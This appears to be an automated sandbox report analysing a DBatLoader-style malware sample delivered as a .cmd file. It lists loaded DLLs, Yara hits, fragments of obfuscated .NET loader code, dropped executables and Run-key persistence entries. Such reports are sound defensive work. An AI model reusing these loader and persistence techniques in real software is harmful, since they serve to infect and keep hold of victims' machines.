Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe	Section loaded: apphelp.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Links\icqplewR.pif

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ_HB648836_Enquiry.cmd

Static file information: File size 1870427 > 1048576

Source:	Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: icqplewR.pif, 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1381377846.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1436995878.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1205441850.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1205441850.0000000001F7A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 3.2.x.exe.3a2e118.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.3a2e118.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.3f50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1225628768.0000000003A2E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	.Net Code: Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777255)),Type.GetTypeFromHandle(MIOq0J32PYx10ZCZDTi.Eh9xfRPw4r(16777285))})
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	.Net Code: Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777255)),Type.GetTypeFromHandle(bFRlLegYq2FtqtTJBjG.CcFylhPt3u(16777285))})
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 9.3.icqplewR.pif.296c7830.0.raw.unpack, ClientFactory.cs	.Net Code: RequestLogicalClient System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, Messages.cs	.Net Code: Memory

Binary contains a suspicious time stamp

Source: icqplewR.pif.3.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F63E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

3_2_03F63E20

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F762A4 push 03F7630Fh; ret	3_2_03F76307
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F53210 push eax; ret	3_2_03F5324C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F761F8 push 03F76288h; ret	3_2_03F76280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5C1C6 push 03F5C61Eh; ret	3_2_03F5C616
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5617C push 03F561BEh; ret	3_2_03F561B6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5617A push 03F561BEh; ret	3_2_03F561B6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F76144 push 03F761ECh; ret	3_2_03F761E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F760AC push 03F76125h; ret	3_2_03F7611D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F6606C push 03F660A4h; ret	3_2_03F6609C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F6A018 push ecx; mov dword ptr [esp], edx	3_2_03F6A01D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5F600 push 03F5F64Dh; ret	3_2_03F5F645
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5F5FF push 03F5F64Dh; ret	3_2_03F5F645
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5F4F4 push 03F5F56Ah; ret	3_2_03F5F562
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5C498 push 03F5C61Eh; ret	3_2_03F5C616
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F62410 push ecx; mov dword ptr [esp], edx	3_2_03F62412
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F75854 push 03F75A3Ah; ret	3_2_03F75A32
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F69FB4 push ecx; mov dword ptr [esp], edx	3_2_03F69FB9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63F84 push 03F63FBCh; ret	3_2_03F63FB4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F62EDC push 03F62F87h; ret	3_2_03F62F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F62EDA push 03F62F87h; ret	3_2_03F62F7F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5BE18 push ecx; mov dword ptr [esp], edx	3_2_03F5BE1D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F5CDE0 push 03F5CE0Ch; ret	3_2_03F5CE04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F55DA0 push 03F55DFBh; ret	3_2_03F55DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F55D9E push 03F55DFBh; ret	3_2_03F55DF3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63D40 push 03F63D82h; ret	3_2_03F63D7A
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0041C40C push cs; iretd	9_1_0041C4E2
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00423149 push eax; ret	9_1_00423179
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0041C50E push cs; iretd	9_1_0041C4E2
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_004231C8 push eax; ret	9_1_00423179
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0040E21D push ecx; ret	9_1_0040E230
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0041C6BE push ebx; ret	9_1_0041C6BF

Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, Hyq4Brhw78ApZ4SE3ZB.cs	High entropy of concatenated method names: 'Uqohxn7GrP', 'gbVh4r6IUF', 'cUoh8g8Vev', 'oDEhBc1I4Q', 'gFDhnAa9Q1', 'Uo9hM1GoGP', 'LhEhqSVXhg', 'kvdhzoJ6NM', 's2sLYqj9jB', 'S8KLpIli9g'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, rEkTNFLac8TI81Vwi6H.cs	High entropy of concatenated method names: 'nrmCNZJKJMZGr53L14D', 'WipnH9JguXIINcDUbYP', 'oux37lIeh3', 'vh0ry9Sq2v', 'sdL3UQoZ1A', 'tvQ3CcOtyW', 'doC3Q6AC0m', 'Jxk3G20AqH', 'm8OxmVCREy', 'fL3Lvwdva0'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, JTOrHY3Mxp4brY4ZQrs.cs	High entropy of concatenated method names: 'jiJoqIxPcB', 'oB3ozIsycD', 'CtltYiLVvQ', 'mLXtp5JLX6', 'QgRtIaU2ao', 'gmAtD0YHHv', 'Ay9t0kc90K', 'LIs5tqXOKm', 'yNEtWhS55q', 'JgCtKbEAi9'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, fGAvyepf0iGWHUqWKm4.cs	High entropy of concatenated method names: 'OexpLRBMFk', 'P0Lp34aEf1', 'MekpUpfQk3', 'fxspQSyFDA', 'e3PpsC2x6w', 'M4CptGHQcv', 'sJPpF2gFSb', 'JUbp9Rf3pq', 'tyQpOY42s6', 'FO3pA8xa3T'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, YUMqjF3jsWoBEsr5Fwg.cs	High entropy of concatenated method names: 'Jht3wYt30B', 'k0C3NuAhZj', 'hr23J9YM3D', 'eSL3PGE9cX', 'mI73r1Z0Ks', 'YhG3xENuJK', 'Pv234TXcDM', 'G6W38ALBMx', 'j5Q3BPkhX0', 'GBp3nSTTja'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, ydlZiQf84uhWGsAUM1E.cs	High entropy of concatenated method names: 'h3bhQEXMTq', 'I5YhGCQIgG', 'x3FhsRChge', 'zEciLSNOoAR4kKC3pPR', 'AUy50QNS3V1824yTsoD', 'unZfnrMvxa', 'IxOfMhgSy0', 'AWOfqqZKgD', 'DxofzdtOBP', 'RYehYqcDQC'
Source: 9.3.icqplewR.pif.299dfe70.2.raw.unpack, fZN1LTKJ207yQQiYiAB.cs	High entropy of concatenated method names: 'eAfKrNnZaQ', 'Y6YK4FbY24', 'VnCKBlkkKQ', 'IUYKMC6841', 'q5bKqBw2nI', 'Kd8Kzf5GPt', 'QrHgYhjl6F', 'P41gpvvsHK', 'squgIeAOpL', 'WH9gDxNkxx'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, OpWNa1gCsVVl3qoAEGr.cs	High entropy of concatenated method names: 'Qxsg9ucVmF', 'IK1gSG1MIe', 'HlMg38Lufs', 'khcgrhorVw', 'TqqgkedqLx', 'hIfgycSS5b', 'uJsg8pq9Js', 'sZNghq3n8i', 'DZ2gVSBEfq', 'pABg1p1h7V'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, NlEo0Ug09yCuHlkoV0l.cs	High entropy of concatenated method names: 'vH8RjFQkmZ', 'WfyRzNMIRh', 'Wqa64H27Td', 'K0v6Q6BEcv', 'MtP6LHYwWW', 'fQl6wblExn', 'Nqc6qBXiEO', 'hEPU6NGhBf', 'iXi6ZlwSgL', 'Xyk6ifa3rW'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, bLbDKIm580VmkPLDdbf.cs	High entropy of concatenated method names: 'zyQ2di3i2l6j5410ink', 'PqCaT53sOkmmaHDmiuO', 'jw7gBdoBAl', 'vh0ry9Sq2v', 'NH9gPeEyqI', 'FFxgtBNYED', 'UCZgxyWA0V', 'aNogbenbYW', 'WWSypjCpEe', 'jm8mJiO6xk'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, dei7f7QlMoqgxwoE3HV.cs	High entropy of concatenated method names: 'hdqQm8nJVr', 'O5aQgUTfIR', 'q24QPhhZsG', 'ST9QxupVWT', 'Ne4QN3uACe', 'S91Q60WuBh', 'VrnQEBWOu8', 'ItCQo3Yu40', 'W2BQuo9v4d', 'YkwQF3232R'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, cWm7ZvK9D7DKQBhU0de.cs	High entropy of concatenated method names: 'zJCKyRhTCI', 'dgYK8TFHpw', 'OfpKhWVbKY', 'IgAKVc0NcZ', 'lOtK1GP9lg', 'kVaK0Y4iuW', 'GANKjb3sKh', 'FvTKz3PvgQ', 'sY0m4PEviZ', 'wVDmQGm96h'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, CsVmIul6FDAeuEBh3ln.cs	High entropy of concatenated method names: 'M6vlF8bbVR', 'lMelYNdtW1', 'ak8ymVSlEAOv4hjo5Yy', 'T4BqefSKTHXRDLtVUGX', 'ztPlE3ZCi4', 'YotlnhPxS8', 'WOOFjgS27fN6tCf0HH1', 'UXnywpSpk0BjtoXKZVx'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, lULnMFi3tidiQoIr9Q9.cs	High entropy of concatenated method names: 'Nx6ik7o4vm', 'g2ai8E73Zr', 'vHSiVtoD5N', 'C7Bi0Cks17', 'wP3ijxQ4yX', 'wJRizVdd3a', 'in5s4KfFxC', 'NMxsQ2SPuv', 'wqRsLenUvQ', 'd7xsw7XmeS'
Source: 9.3.icqplewR.pif.292f4458.3.raw.unpack, mK7HkAlhQXehFFXaTSG.cs	High entropy of concatenated method names: 'NyDKxXomDv', 'hXMKbjw9Ed', 'a9eKNZbycU', 'MCwBA3SuaKEcIsgtsF2', 'Fo7AOMSWlooyUg6NTes', 'cTBl1bDtOv', 'mOPl065GRZ', 'tErljd8g4e', 'tVblzguIdZ', 'hOrK4baair'
Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'BL1I6XGhq9AA4', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\user\Links\icqplewR.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\user\Links\Rwelpqci.PIF			Jump to dropped file

Drops PE files

Source: C:\Users\user\Links\icqplewR.pif	File created: C:\Users\user\AppData\Roaming\XClient.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\user\Links\icqplewR.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\user\Links\Rwelpqci.PIF	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rwelpqci			Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rwelpqci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rwelpqci	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
